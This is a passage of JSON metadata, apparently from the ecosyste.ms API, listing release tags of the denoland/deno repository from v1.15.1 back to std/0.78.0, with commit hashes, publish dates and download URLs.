itHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78